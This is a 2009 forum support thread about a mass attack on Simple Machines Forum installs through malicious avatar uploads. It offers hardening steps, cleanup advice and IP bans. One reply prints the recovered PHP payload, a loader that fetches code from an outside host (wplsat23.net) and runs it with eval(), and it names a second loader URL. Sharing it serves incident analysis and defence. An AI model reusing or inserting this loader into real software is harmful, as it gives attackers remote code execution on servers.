Simple Machines Community Forum

SMF 1.0.17 / 1.1.9 / 2.0 RC1-1 Patch is out! Click here to download. (http://www.simplemachines.org/community/index.php?topic=311899.0)

Considering the recent mass attack on SMF forums over the past week, and seeing as I, myself, have helped many users to get their sites back, I am posting this so you can prevent being attacked.

Following these simple instructions will make your forum invulnerable to the recent attack by uploadable avatar.

---

[EDIT]
Here are a few other things that you may find interesting. These were submitted by other members.

http://www.simplemachines.org/community/index.php?topic=307717.msg2057480#msg2057480
http://www.simplemachines.org/community/index.php?topic=307717.msg2053661#msg2053661
http://www.simplemachines.org/community/index.php?topic=307717.msg2046772#msg2046772
http://www.simplemachines.org/community/index.php?topic=307717.msg2060807#msg2060807

---

1) Disable attachment & avatar uploads
This includes uploads from URL's as well.
Disable from
Admin -> Attachments and avatars -> Avatar Settings

• Uncheck "Download avatar at given URL
• Uncheck all: "Membergroups allowed to upload an avatar to the server"

Admin -> Attachments and avatars -> Attachment settings

• Attachments mode: Disable attachments

---

2) Ask your host if their servers/software are up to date

• Most hacks are effective when the host has outdated software such as old versions of PHP, Apache and MySQL for example.
• Don't be scared to ask your host if their side of security is up to date. It is their responsibility to help protect you as well.
• Check your hosts versions of MySQL, PHP, Apache, etc. Make a file called phpinfo.php with the following content:

<?php
phpinfo();
?>
Place that file into your root directory and execute it by navigating to it directly
Ex. http://www.mysite.com/phpinfo.php

---

3) Update SMF to the latest version
This is a big issue as pervious versions of SMF have well known secuity issues and leave you vulnerable. It is important to upgrade when newer versions are out.

• Visit Upgrading SMF (http://docs.simplemachines.org/index.php?board=3.0;sort=subject)
• Latest versions are 1.1.8 and 2.0 RC1

---

4) Install Anti-Spam measures
This is important, as it will save your forum in the long run.

Install the Stop Spammer (http://custom.simplemachines.org/mods/index.php?mod=1547) mod.

• This mod will prevent spam signups as it cross-checks all registrations with the Spam Blacklist.
• Any registrations that check positive will be sent to the Admin approval bin.

Install the reCAPTCHA for SMF (http://custom.simplemachines.org/mods/index.php?mod=1044) mod.

• This mod provides better captcha verification.
• It will stop MOST spam and hackers from registering.

---

5) Don't Ignore Your Members or Forum
Most owners/Admins think that their forums will run themselves. Hacks and spam do the most damage when an admin/owner/moderator fail to do their job. Keep a constant eye on your forum at all times.

---

Following these simple steps will secure your forum. Should you have any questions, or feel that I have left something out, do not hesitate to ask them here. But please, Do Not PM me with questions :)

Regards, JBlaze

Nice write up. I have been using Stop Spammer for a while now and added the Anti-Spam Verification Questions mod (http://custom.simplemachines.org/mods/index.php?mod=1516 ) a few months back. Would you say ReCaptcha would be a better measure as in comparison to the ASVQ mod as I can't add ReCaptcha without manual edits?

Quote from: chrishicks on May 11, 2009, 08:39:04 AM
Nice write up. I have been using Stop Spammer for a while now and added the Anti-Spam Verification Questions mod (http://custom.simplemachines.org/mods/index.php?mod=1516 ) a few months back. Would you say ReCaptcha would be a better measure as in comparison to the ASVQ mod as I can't add ReCaptcha without manual edits?

Thanks :)

ASVQ is nice, but doesnt stop manual spam registrations. Stop Spammer does.

reCAPTCHA is nice because spambot have a harder time with it.

Thanx JBlaze. I had big problems with my forum but think everything is back to normal now. I just added those two packages and I hope the spamviruses will keep out.

Very good thanks for taking the time to post this  :D

Great info, thanks.

Just wondered if you need to revoke these permissions for ALL membergroups, if any additional groups (over and above Regular Memebers) need to be administered by me?  Didn't realise there was a spate of attacks so glad I checked in!

Cheers

G

Quote from: Granular on May 11, 2009, 09:54:03 AM
Great info, thanks.

Just wondered if you need to revoke these permissions for ALL membergroups, if any additional groups (over and above Regular Memebers) need to be administered by me?  Didn't realise there was a spate of attacks so glad I checked in!

Cheers

G

Well, I believe it would be safe to allow attachments/avatars for select membergroups, except regular/registered users group (aka Default Membergroup), but to err on the side of caution, I would disable them outright and just link to attachments/avatars remotely.

Great Tips JBlaze, thanks... :)

Quote from: Dzonny on May 11, 2009, 11:00:21 AM
Great Tips JBlaze, thanks... :)

Thanks.

Good post. I have always been wary of allowing avatar and attachment uploads by members because of this. I was not certain that an exploit was there, but always wondered and went to the cautious side of things. I am certainly glad I did. It seems this guy(or group) has wreaked much havoc.

I can't help but wonder how many more, maybe hundreds, that have not posted or searched here for answers.

Quote from: busterone on May 11, 2009, 11:24:53 AM
Good post. I have always been wary of allowing avatar and attachment uploads by members because of this. I was not certain that an exploit was there, but always wondered and went to the cautious side of things. I am certainly glad I did. It seems this guy(or group) has wreaked much havoc.

I can't help but wonder how many more, maybe hundreds, that have not posted or searched here for answers.

Hopefully, by following what I posted, anyone who reads this will not be affected by this attack.

Please make this topic sticky (at least for a few days). It will save up tears and nerves breaking.  :)

I highly recommend using the suhosin module with php.  It appears to have prevented the this attack on all of my forums (though I'm not certain how it helped).

I have not open my forum yet.  It is the first time for me with forums. Actually, I was just today setting permissions etc.  I am a little confused with "uploadable" avatars, "remote avatars" "attachment" spammers, etc.

So, I would really appreciate if you clarify where and what in the Admin panel I have to check/uncheck in order to make the forum safer.

Are you recommending not to allow members to have avatars and not to post attachemen ts?

Quote from: confusion on May 11, 2009, 07:19:45 PM
I highly recommend using the suhosin module with php.  It appears to have prevented the this attack on all of my forums (though I'm not certain how it helped).

Could you elaborat on what "suhosin" is? I'm not sure I've heard of it...

Quote from: nina-nina on May 11, 2009, 08:42:59 PM
I have not open my forum yet.  It is the first time for me with forums. Actually, I was just today setting permissions etc.  I am a little confused with "uploadable" avatars, "remote avatars" "attachment" spammers, etc.

So, I would really appreciate if you clarify where and what in the Admin panel I have to check/uncheck in order to make the forum safer.

Are you recommending not to allow members to have avatars and not to post attachemen ts?

This can explain better than I can :)
Attachments and Avatars Manager (http://docs.simplemachines.org/index.php?board=50.0;sort=subject)
How do I make the board safer against hacker attacks? (http://docs.simplemachines.org/index.php?topic=463)

Suhosin explanation here -> http://www.hardened-php.net/suhosin/index.html (http://www.hardened-php.net/suhosin/index.html)

Quote from: oakview on May 12, 2009, 01:02:13 AM
Suhosin explanation here -> http://www.hardened-php.net/suhosin/index.html (http://www.hardened-php.net/suhosin/index.html)

Thank you. Seems interesting....

Quote from: confusion on May 11, 2009, 07:19:45 PM
I highly recommend using the suhosin module with php.  It appears to have prevented the this attack on all of my forums (though I'm not certain how it helped).

We was hacked: suhosin & 1.1.8.  :(

Does smf 1.1.8. have some avatar uploads security risk, or is there some known bugs or smth about this?

Quote from: Dzonny on May 12, 2009, 09:07:07 AM
Does smf 1.1.8. have some avatar uploads security risk, or is there some known bugs or smth about this?

Be sure it does. We are awaiting corresponding patch.

/me sticks this topic.

Thank, but apparently it's too late for me.
I have done anything that appears here and banned the user, but what can i do to get the theme choose page back? Or whatever problem this exploit causes too?

Thanks.

Ok, but i cant belive this kind of mistake is done with this last stable version... :/
I've disable uploads for now, and i hope that patch will be released soon...

Hello,

For the ones that had this code injected, appart from doing everything in this post to prevent future abuse, please take a look here for the solution. At least what you have to do to remove the code.

http://www.simplemachines.org/community/index.php?topic=309957.0

Can we test to disable (with .htaccess) php-engine from this directory?
krisbarteo is already registered in more SMF forum:
http://www.google.it/search?source=ig&hl=it&rlz=&=&q=krisbarteo&btnG=Cerca+con+Google&meta=lr%3D&aq=f&oq=
in any case i've put this htaccess in my attachments folder:
# Prevent Directory Listing
Options -Indexes

# Prevent Direct Access to Program Files
<Files *>
Order Deny,Allow
Deny from all
Allow from localhost
</Files>with this it can't use full url eg: mysite.*/forum/attachments/avatar_xx.*
-
and i've prebanned krisbarteo user.

http://www.google.com/search?q=krisbarteo&lr=
default language for whatever your Google normally is ;)


The exploit appears to be in the EXIF data, and executed after the JPEG is uploaded through the avatar uploading functions.  I wonder if the crap bothers to check where the actual avatars are uploaded to?  For now I changed where the avatars get uploaded to, as well as the location for the rest of the attachments.

What might stop this dead in it's tracks for now is if all avatars are forced to be converted into PNG.  Sort of like this
(https://www.simplemachines.org/community/proxy.php?request=http%3A%2F%2Fimg518.imageshack.us%2Fimg518%2F2823%2Fattachmentsandavatars.png&hash=f5e03a02f6f1d313ebbf6ecbc91432a485e83cfd)
but gets run on all uploaded avatars.

Another thing that wouldn't hurt is to pre-create a user named krisbarteo on your forum, and then ban it.  You can then also track the IPs that try to use it. :)

Just kicking out some ideas here.

Quote from: uncajesse on May 12, 2009, 03:34:57 PM
http://www.google.com/search?q=krisbarteo&lr=
default language for whatever your Google normally is ;)


The exploit appears to be in the EXIF data, and executed after the JPEG is uploaded through the avatar uploading functions.  I wonder if the crap bothers to check where the actual avatars are uploaded to?  For now I changed where the avatars get uploaded to, as well as the location for the rest of the attachments.

What might stop this dead in it's tracks for now is if all avatars are forced to be converted into PNG.  Sort of like this
(https://www.simplemachines.org/community/proxy.php?request=http%3A%2F%2Fimg518.imageshack.us%2Fimg518%2F2823%2Fattachmentsandavatars.png&hash=f5e03a02f6f1d313ebbf6ecbc91432a485e83cfd)
but gets run on all uploaded avatars.

Another thing that wouldn't hurt is to pre-create a user named krisbarteo on your forum, and then ban it.  You can then also track the IPs that try to use it. :)

Just kicking out some ideas here.

The best idea now is to just disable avatars and attachments.

Or set it up so that only members with say 5-10 posts or more can upload avatars/attachments.

http://www.stopforumspam.com/search?q=krisbarteo
http://www.stopforumspam.com/search?q=MagicOPromotion

[edit]
ah nevermind, it's probably just one person, or two friends.  those IPs are very similar.
[/edit]

http://www.stopforumspam.com/search?q=94.142.128

That's how big this attack has gotten.

He's a spam bot, not human.

and
http://www.stopforumspam.com/search?q=94.142.129

and yeah, we know it's not someone MANUALLY doing this.

I'm blocking 94.142.128-129.* right now. :)

OMG my forum 1.1.8 has a special avatar upload mod on registration.

Quote from: Filipina on May 12, 2009, 11:41:29 PM
OMG my forum 1.1.8 has a special avatar upload mod on registration.

Just to be safe, install the Stop Spammer mod I referenced in the OP. This will prevent this IP range from regeistering.

Ok  thanks but it says

This mod will prevent spam signups as it cross-checks all registrations with the Spam Blacklist.
Any registrations that check positive will be sent to the Admin approval bin.

Since avatars upload on registration will I not have the infected file already on my server, even if the registration goes to Admin for approval? :)

Actually, that is a good question. I would disable the avatar on registration then until the security patch comes out.

Ok thanks i just turned regiatration off.  The mod was special made and I do not know how to get it off the registration page :) Hope a patch comes out soon. 

Quote from: JBlaze™ on May 12, 2009, 04:18:03 PM
http://www.stopforumspam.com/search?q=94.142.128

That's how big this attack has gotten.

This is really big list, so prebann of krisbarteo dont have case?

I've made a fairly long post about our findings, which suggest some patches that should be made, here:
http://www.simplemachines.org/community/index.php?topic=307717.msg2057480#msg2057480

We got hacked as well on 1.1.8

http://www.pclinuxos.de/smf/

Same behaviour - all relevant PHP files were infected with the encrypted codelines. The forum-error-log in the backend was completely full (735 sites) with errors, caused by the base64 encrypted lines. I performed a full recovery last night.

The user "krisbarteo" was registered as well and he uploaded that .gif avatar which contained the code. Perma-banned him now and disabled upload of avatars and attachments for now.

IMHO this warning should be visible in the admin backend of the SMF.


Regards

Over the last two weeks my site has been attacked by Phishing files. They were uploaded into various files on my server. I removed them, however my site yesterday was sending out phishing emails somehow. i looked for files that shouldnt be there, but to no avail.

I've now uploaded a complete fresh install of my site, is this to do with this attack? Or do I have a different problem?

**edit**

Looking through my site files (pre clean up) I found two files in the sources folder titled ghana .php and 1.php the 1.php was a phishing mailer.

I have no idea how they got these onto my site. However I havd disabled all attachments and avatars until the patch is released.

Hi everybody.

I am about to install the firstmentioned mod's but i would like to share sometjing with you.

I run a forum and have set it up to all registrations to be approved by admin's. I do get up to 5 or more weirdo 'registrations' per day and then simply reject them. have also banned quite a number of them. Seems like it works.

If I install die mod(s) will it prevent even the attempts to register? So my 'Awaiting Approval'-list will be (almost) empty in the morning?

Regards and thanks for evrybody's time to contribute to this topic.

The approval by admin method does work as long as you know what to look for. The Stop Spammer mod will highlight suspicious and/or reported IP's emails and usernames AFTER they register, but it will put that account into approval state.

The reCAPTCHA mod will prevent spam registration period.

I've some potential good info
Avatar code:
<?php;$url = 'http://wplsat23.net/?update=main';$done = false;if(!$url){return '';}$url_info = parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : "/"; $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : ""; $query = "GET " . $url_info[path] . " HTTP/1.1\r\n"; $query = $query . "Host: " . $url_info[host] . "\r\n"; $query = $query . "Accept: */*" . "\r\n"; $query = $query . "Connection: close" . "\r\n"; $query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n"; $query = $query . "\r\n"; $errno = 0; $error = ""; $sock = fsockopen($url_info[host], $url_info[port], $errno, $error, 30);$h = array();$resp = array();if($sock){stream_set_timeout($sock, 30);fwrite($sock, $query);$hd = false;while(!feof($sock)){$l = fgets($sock);if(!$hd){if(trim($l) == ''){$hd = true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret = implode("", $resp);eval($ret);?>
Important link: http://wplsat23.net/?update=main
And here: http://nomsat23.net/?update=js&host= (block page and see source code)
I think if you don't have fsockopen enabled this bug can't work :)

hmmm...
Will patch be released soon?

I'm hoping. The developers are working on it as a priority so keep your eyes peeled.

Once it is finished, I'm sure they will let everyone know.

/me marks topic solved to take it off supporttopics.php

-[n3rve]

Quote from: [n3rve] on May 14, 2009, 10:18:30 AM
/me marks topic solved to take it off supporttopics.php

-[n3rve]

Heh... I forgot about that. And btw, it's still marked unsolved :P

No, its marked as solved now... :)
And i belive this is going to be really solved soon..

Quote from: Dzonny on May 14, 2009, 01:48:55 PM
No, its marked as solved now... :)
And i belive this is going to be really solved soon..

I marked it as solved :P

I really hope I read this thread sooner. I got hacked today, and what stinks is that I know so little about any of this stuff. I contacted my server people and they said it's deffinitely hacked. I followed all of these steps you have posted, and I hope it works for the future.

Thank you so much for taking the time to post all this. You guys are really great!

Quote from: dl75 on May 14, 2009, 02:58:47 PM
I really hope I read this thread sooner. I got hacked today, and what stinks is that I know so little about any of this stuff. I contacted my server people and they said it's deffinitely hacked. I followed all of these steps you have posted, and I hope it works for the future.

Thank you so much for taking the time to post all this. You guys are really great!

Have you already cleaned it up? What has your host said?

Well like I said, being I know nothing, I only listened. He said that someone hacked in, and he had to restore my forum back to like 4 days ago (no need to say that I lost everything that was done on the forum for the past 4 days).

The only thing I did is just now disabled avatar and attachments upload. I don't remember the whole message, but it said error was on in index.php on line 54

Forum seems OK now, I'm just terrified of this happening again.

QuoteMove the included file "files/recaptchalib.php" to "./Sources".

Thanks for this
a bit stuck as to how to do this ??

Quote from: greystonesguide on May 14, 2009, 06:14:12 PM

QuoteMove the included file "files/recaptchalib.php" to "./Sources".

Thanks for this
a bit stuck as to how to do this ??

Best to ask this question in the mods support topic. :)

Hi
Was a bit stumped then just realised how to do it after spending ages thinking about it
The joys of it!!!
Thanks a lot - great stuff

Quote from: greystonesguide on May 14, 2009, 06:22:13 PM
Hi
Was a bit stumped then just realised how to do it after spending ages thinking about it
The joys of it!!!
Thanks a lot - great stuff

No problem. Even though I didn't help at all :P

I uploaded the stopspammer and it said it was uploaded sucessfully, I see it in the packages, but I don't see it anywhere else? How do you use this if you can't see it. Did I miss a final step. I saved the zip file to desktop. Uploaded it into my forum. It said uploaded ok, it's in my packages, how do I access it. Should I see it listed somewhere on the menu?

Quote from: yankeestonk on May 14, 2009, 06:59:19 PM
I uploaded the stopspammer and it said it was uploaded sucessfully, I see it in the packages, but I don't see it anywhere else? How do you use this if you can't see it. Did I miss a final step. I saved the zip file to desktop. Uploaded it into my forum. It said uploaded ok, it's in my packages, how do I access it. Should I see it listed somewhere on the menu?

The Stop Spammer mod is only active when a blacklisted IP, username, or email is detected trying to sign in to your site. Then, that account goes into approval state.

Look in your approvals section of Admin -> Members

Updated.

JBlaze, I apologize if I'm posting this in the wrong section. As you know of my hacking incident, now I'm all paranoid. I just uploaded "stopspammer", tested it, it looks alright so far.  Now, I had visual verification installed a while back. Just now when I tested stopspammer, the registration seems to be loading SUPER slow. Could that be an aftermath of the hacking? Is there anything I do about this?

Thank you

I have noticed that since the Stop Spammer mod cross checks all info about each regsitration, when the stopforumspam.com site is slow, so are registrations.

Some sacrifice in speed is needed for proper security.

Hey- Thanks so much for your help!! I don't mind AT ALL that registration takes a little while. Good enough for me.

I have tried to set up recaptcha on my site and am getting the following :

Installing this package will perform the following actions:  Type Action Description
1. Execute Modification ./Sources/ManageRegistration.php Test failed
2. Execute Modification ./Sources/Register.php Test failed
3. Execute Modification ./Themes/default/Register.template.php Test failed
4. Execute Modification ./Themes/default/languages/Modifications.english.php Test successful
5. Execute Modification ./Themes/default/languages/Modifications.english-utf8.php Skipping file
6. Execute Modification ./Themes/default/languages/Modifications.english_british.php Skipping file
7. Execute Modification ./Themes/default/languages/Modifications.english_british-utf8.php Skipping file
8. Extract File ./Sources/recaptchalib.php 

Dont know what to do now???

u can post your questions about that mod here:
http://www.simplemachines.org/community/index.php?topic=213535.0

Think that u should manually install that mod...

Quote from: JBlaze™ on May 11, 2009, 08:05:23 AM
4) Install Anti-Spam measures
This is important, as it will save your forum in the long run.

Install the Stop Spammer (http://custom.simplemachines.org/mods/index.php?mod=1547) mod.

• This mod will prevent spam signups as it cross-checks all registrations with the Spam Blacklist.
• Any registrations that check positive will be sent to the Admin approval bin.

Install the reCAPTCHA for SMF (http://custom.simplemachines.org/mods/index.php?mod=1044) mod.

• This mod provides better captcha verification.
• It will stop MOST spam and hackers from registering.

Regards, JBlaze

I would like to try registrating on a forum where both mods are installed.
Who has both mods installed (link)?

I see no obvious problem with using them both. One provides a captcha, and one only references the spammer database after the actual registration form...

Quote from: JBlaze™ on May 14, 2009, 01:49:19 PM

Quote from: Dzonny on May 14, 2009, 01:48:55 PM
No, its marked as solved now... :)
And i belive this is going to be really solved soon..

I marked it as solved :P

Any update on a patch? In testing, timeline? I know release dates arent given timelines but please let us know for a patch.

Shouldnt this be in the Admin News section of the Administration Panel in everyone's SMF? Right now there's news about RC1; I think administrators would rather know about a live exploit.

got the reCAPTCHA sorted at last - started from scratch again and it worked

Would the advice be to insert both mods ????

Yes, use both mods.

Cheers

Hello there.
My forum was hacked last week and my 3.000 plus attachments were made unavailable.
My team thought it was due to some kind of mod we installed, but after a week trying to understand this i found it was an attack  to the forum...
I have none of the mentioned members that upload the avatar to the server and hack the files, but there's no doubt that's what happened.
We've been uploading all the attachments again to the server, but i noticed that when i send an avatar to the server via profile, it won't show. This gives me almost 100% confidence that the forum was hacked.
Thanks for the info, i'm going to install the two mods and make the changes in admin panel.


Nevertheless, I have been reading lots of SMF admins complaining about this, and i think it would be good to put this info somewhere more visible to try and guide them.

Quote from: Ziggy on May 17, 2009, 09:46:26 AM

Quote from: JBlaze™ on May 11, 2009, 08:05:23 AM
4) Install Anti-Spam measures
This is important, as it will save your forum in the long run.

Install the Stop Spammer (http://custom.simplemachines.org/mods/index.php?mod=1547) mod.

• This mod will prevent spam signups as it cross-checks all registrations with the Spam Blacklist.
• Any registrations that check positive will be sent to the Admin approval bin.

Install the reCAPTCHA for SMF (http://custom.simplemachines.org/mods/index.php?mod=1044) mod.

• This mod provides better captcha verification.
• It will stop MOST spam and hackers from registering.

Regards, JBlaze

I would like to try registrating on a forum where both mods are installed.
Who has both mods installed (link)?

I have both mods installed... Go ahead and register if you want... (you arent a spammer right?)  ;)

Jblaze, I have one question and I may be on the wrong thread. But what version of the Stop Spam should I add?


StopSpammer_v1_0.zip (8KB) [731] 

StopSpammer_v2_1.zip (14KB) [198] 

StopSpammer_v2_2.zip (14KB) [1642]



I am using smf v 1.1.8 and I already have the other mod  you suggested installed

I tried the third one (_v2_2) but it messed up like images were supposed to be there but weren't. I assume I used the wrong version


any ideas?

If you installed on a custom theme, you must move the images included with the mod to your custom theme's /images directory

Oh ok, thanks

that worked

but it doesn't show krisbarteo  as a spammer.

is that what it is supposed to do? It has the More Info image by it like everyone else's name does

It will only show names that are trying to register as well as names in your memberlist that are suspicious.

Ok, thanks

I have banned the three names mentioned within this site and have done all you said to do. So I should be good to go now.

I'll be on the look out for the patch

thanks for all the work you have done to help us

Quote from: Broken Arrow on May 17, 2009, 09:17:23 PM
Ok, thanks

I have banned the three names mentioned within this site and have done all you said to do. So I should be good to go now.

I'll be on the look out for the patch

thanks for all the work you have done to help us

No problem :)

All in a days work.

Quote from: Yahmez on May 17, 2009, 07:50:43 PM

Quote from: Ziggy on May 17, 2009, 09:46:26 AM

Quote from: JBlaze™ on May 11, 2009, 08:05:23 AM
4) Install Anti-Spam measures
This is important, as it will save your forum in the long run.

Install the Stop Spammer (http://custom.simplemachines.org/mods/index.php?mod=1547) mod.

• This mod will prevent spam signups as it cross-checks all registrations with the Spam Blacklist.
• Any registrations that check positive will be sent to the Admin approval bin.

Install the reCAPTCHA for SMF (http://custom.simplemachines.org/mods/index.php?mod=1044) mod.

• This mod provides better captcha verification.
• It will stop MOST spam and hackers from registering.

Regards, JBlaze

I would like to try registrating on a forum where both mods are installed.
Who has both mods installed (link)?

I have both mods installed... Go ahead and register if you want... (you arent a spammer right?)  ;)

Funny how after I posted this I had a bunch of spammers try to register... Hmmmmmm

Quote from: Ziggy on May 17, 2009, 09:46:26 AM




I would like to try registrating on a forum where both mods are installed.
Who has both mods installed (link)?

You can try mine Ziggy

the forum is http://www.brokenarrowspeacepipe.com/forum2/

Quote from: Yahmez on May 17, 2009, 09:56:36 PM
Funny how after I posted this I had a bunch of spammers try to register... Hmmmmmm

Most likely, you didn't notice that you had spammers registering until this mod brought it to your attention. That's the way it was for me.

Quote from: JBlaze™ on May 17, 2009, 10:30:36 PM

Quote from: Yahmez on May 17, 2009, 09:56:36 PM
Funny how after I posted this I had a bunch of spammers try to register... Hmmmmmm

Most likely, you didn't notice that you had spammers registering until this mod brought it to your attention. That's the way it was for me.

No I have had it installed for a month now and I found these recent visitors via geoip...

In any case, this mod is 100% percent safe, or I wouldn't have recommended it. Also, if it weren't safe, it wouldn't be on the mod site.

Quote from: JBlaze™ on May 17, 2009, 10:34:32 PM
In any case, this mod is 100% percent safe, or I wouldn't have recommended it. Also, if it weren't safe, it wouldn't be on the mod site.

Misunderstanding. The mods are great! I was wondering why I had a sudden surge after posting that I had those mods installed... That was all. No one actually made it through to get my disapproval so all's well!  :P

Quote from: Broken Arrow on May 17, 2009, 10:28:44 PM

Quote from: Ziggy on May 17, 2009, 09:46:26 AM




I would like to try registrating on a forum where both mods are installed.
Who has both mods installed (link)?

You can try mine Ziggy

the forum is http://www.brokenarrowspeacepipe.com/forum2/

Thanks Broken Arrow!

I have tried registrating, but there is an error:

QuoteFatal error: Call to undefined function recaptcha_check_answer() in /home2/broken/public_html/forum2/Sources/Register.php on line 184

Guys,

My forum has been one of many hacked. Is there away to repair the damaged avatars/attachments?

I have no experience in coding etc.

Cheers
Brett

The easiest way would be to revert to a clean backup, and temporarily disable all uploads until a patch is released.

This is where I have been bad and haven't been doing regular back ups. I guess I learn the hard way...

Then you pretty much should delete everything except your attachements, and settings.php and upload fresh files from an upgrade package to replace the infected files - and then manually check the settings.php and your latest avatars and attachments that they are ok...

Quote from: Yahmez on May 17, 2009, 11:07:30 PM

Quote from: JBlaze™ on May 17, 2009, 10:34:32 PM
In any case, this mod is 100% percent safe, or I wouldn't have recommended it. Also, if it weren't safe, it wouldn't be on the mod site.

Misunderstanding. The mods are great! I was wondering why I had a sudden surge after posting that I had those mods installed... That was all. No one actually made it through to get my disapproval so all's well!  :P

It's a coincidence.
My site is relatively unknown and not really public, yet we've gotten 20 auto-banned applications today alone. There is always a spike in registration or drive by attempts whenever a new exploit shows up in SMF or PHPbb.

Quote from: myswag on May 18, 2009, 02:48:47 PM
This is where I have been bad and haven't been doing regular back ups. I guess I learn the hard way...

When is your most recent db backup from before the hack?

Quote from: Ziggy on May 18, 2009, 02:32:29 AM

Quote from: Broken Arrow on May 17, 2009, 10:28:44 PM

Quote from: Ziggy on May 17, 2009, 09:46:26 AM

well Ziggy, I have no idea what that means

Too much security maybe? LOL


right now I am really confused as to what to do next. That hacker has codes all over other parts of my site besides the forum. It will take me a week to figure all this out

thanks for letting me know though




I would like to try registrating on a forum where both mods are installed.
Who has both mods installed (link)?

You can try mine Ziggy

the forum is http://www.brokenarrowspeacepipe.com/forum2/

Thanks Broken Arrow!

I have tried registrating, but there is an error:

QuoteFatal error: Call to undefined function recaptcha_check_answer() in /home2/broken/public_html/forum2/Sources/Register.php on line 184

Looks like the recaptcha thing messed up

I uninstalled that recaptcha  thing and tried to register using another name using my business email address and now it's telling me I am spam and to report myself to myself

this is insane!

well it wasn't the recaptcha or stop spam thing. It was another mod I had installed called Stop Forum Spam

I have reinstalled the other two and can register now without it messing up. I have to approve all registrations though....so go ahead and try again Ziggy

Are You Human locked me out of my own forum - LOL!

Quote from: Uhura! on May 18, 2009, 08:26:20 PM
Are You Human locked me out of my own forum - LOL!

At least it works :)

Maybe she isn't human. How would we know? ;)

Quote from: Antechinus on May 18, 2009, 08:31:46 PM
Maybe she isn't human. How would we know? ;)

Thus the statement...

Quote from: JBlaze on May 18, 2009, 08:27:02 PM
At least it works :)

Good point - if it's locking homo sapiens out....that makes sense. I'm homo superior  :P

I got hacked into again!!! I have kapcha and black list check upon registration- This really stinks!!!

How?

Pls post details!

I know VERY little about any of this stuff. The code tht displayed on the page (while I couldn't log in ) is the same code that was displayed last week, first time I got hacked. I called the server company, and they told me it was in fact the hack.

A friend of mine just looked at it and he thinks it comes from the gallery. Coppermine is bridged with my SMF forum.

I've set registration to admin approval until I get around to installing harsher registration methods, since I discovered we'd been hacked yesterday and that it had been there for two weeks! I noticed my avatar was gone, but most other people host theirs offsite so figured it was a glitch. Someone tried to attach something and flagged it as not working, had a peek in the FTP and noticed all the modified file dates were the same. Checked the files, lo and behold...

Deleted everything and uploaded a fresh install, removed crap from database. Banned the krisbarteo account, thought I did the IP but guess not because it just tried to register another account! Rebanned. Changed registration settings.

Cannot believe the cheek of some people. Why not use these skills for something worthwhile?! Gah.

We got hacked a couple of months ago, they got shell access somehow and had this file where you could see everything. Never quite worked out how they got that up there though, and completely deleted everything then too. Getting annoyed, that same week on another server entirely my wordpress blog got hacked. Bored of cleaning up after these people! Our members are none too happy either.

Quote from: Trubble on May 19, 2009, 01:04:59 PM


Deleted everything and uploaded a fresh install, removed crap from database. Banned the krisbarteo account, thought I did the IP but guess not because it just tried to register another account! Rebanned. Changed registration settings.

Put the name krisbarteo in your reserved names list, then he won't be able to register in that name.   You'll also see if krisbarteo tries to sign up, cause it will be in your forum error log.

My website too had been hacked. I'm surprised a bot could do it, since I had set my CAPCHA to the highest difficulty level, and hadn't had a bot access for 30 days, since I set it to that level. So either a human was involved, or the bot's OCR skills have improved.

I hadn't done a backup, figuring my website host could do it. They could - for $75! Not wanting to spend the money, I first disabled uploads of avatars and attachments, as suggested here. Then I backed up my corrupted website to my local PC (just in case), and downloaded 1.1.8 to my local PC. Since my website was infected yesterday, all corrupted files had that day's timestamp on them, helping me identify them. I updated all corrupted files and deleted the new corrupted files added by the bot.

The only glitch was to heed the warning not to mess with file 'settings.php'. But it was corrupted too. So I downloaded it via FTP, brought it into the Wordpad editor on my Windows PC, stripped off the first line, which was corrupted, and copied the result back to my website.

To my relief, my settings were still intact, as was the database of subjects. The log file also stopped recording its usual volume of error messages due to the hack. In summary, I believe I'm back to normal. OH, and after confirming things were back to normal, I immediately made my first website backup!

Quote from: Don Peters on May 19, 2009, 03:44:14 PM
My website too had been hacked. I'm surprised a bot could do it, since I had set my CAPCHA to the highest difficulty level, and hadn't had a bot access for 30 days, since I set it to that level. So either a human was involved, or the bot's OCR skills have improved.

I hadn't done a backup, figuring my website host could do it. They could - for $75! Not wanting to spend the money, I first disabled uploads of avatars and attachments, as suggested here. Then I backed up my corrupted website to my local PC (just in case), and downloaded 1.1.8 to my local PC. Since my website was infected yesterday, all corrupted files had that day's timestamp on them, helping me identify them. I updated all corrupted files and deleted the new corrupted files added by the bot.

The only glitch was to heed the warning not to mess with file 'settings.php'. But it was corrupted too. So I downloaded it via FTP, brought it into the Wordpad editor on my Windows PC, stripped off the first line, which was corrupted, and copied the result back to my website.

To my relief, my settings were still intact, as was the database of subjects. The log file also stopped recording its usual volume of error messages due to the hack. In summary, I believe I'm back to normal. OH, and after confirming things were back to normal, I immediately made my first website backup!

Glad to hear the good news!

On another note, I am taking a little break from resolving hacks once the patch is issued. Please respect this fact and do not ask me for support. There are other team members and community members that would be as willing to help as me.

Regards,
JBlaze

Quote from: JBlaze on May 19, 2009, 04:04:29 PM

Quote from: Don Peters on May 19, 2009, 03:44:14 PM
My website too had been hacked. I'm surprised a bot could do it, since I had set my CAPCHA to the highest difficulty level, and hadn't had a bot access for 30 days, since I set it to that level. So either a human was involved, or the bot's OCR skills have improved.

I hadn't done a backup, figuring my website host could do it. They could - for $75! Not wanting to spend the money, I first disabled uploads of avatars and attachments, as suggested here. Then I backed up my corrupted website to my local PC (just in case), and downloaded 1.1.8 to my local PC. Since my website was infected yesterday, all corrupted files had that day's timestamp on them, helping me identify them. I updated all corrupted files and deleted the new corrupted files added by the bot.

The only glitch was to heed the warning not to mess with file 'settings.php'. But it was corrupted too. So I downloaded it via FTP, brought it into the Wordpad editor on my Windows PC, stripped off the first line, which was corrupted, and copied the result back to my website.

To my relief, my settings were still intact, as was the database of subjects. The log file also stopped recording its usual volume of error messages due to the hack. In summary, I believe I'm back to normal. OH, and after confirming things were back to normal, I immediately made my first website backup!

Glad to hear the good news!

On another note, I am taking a little break from resolving hacks once the patch is issued. Please respect this fact and do not ask me for support. There are other team members and community members that would be as willing to help as me.

Regards,
JBlaze

Some smf rehab time JBlaze :D

Yes, babjusi, I'm heading to the SMF Asylum for some quiet time :P

Quote from: Yahmez on May 17, 2009, 07:50:43 PM

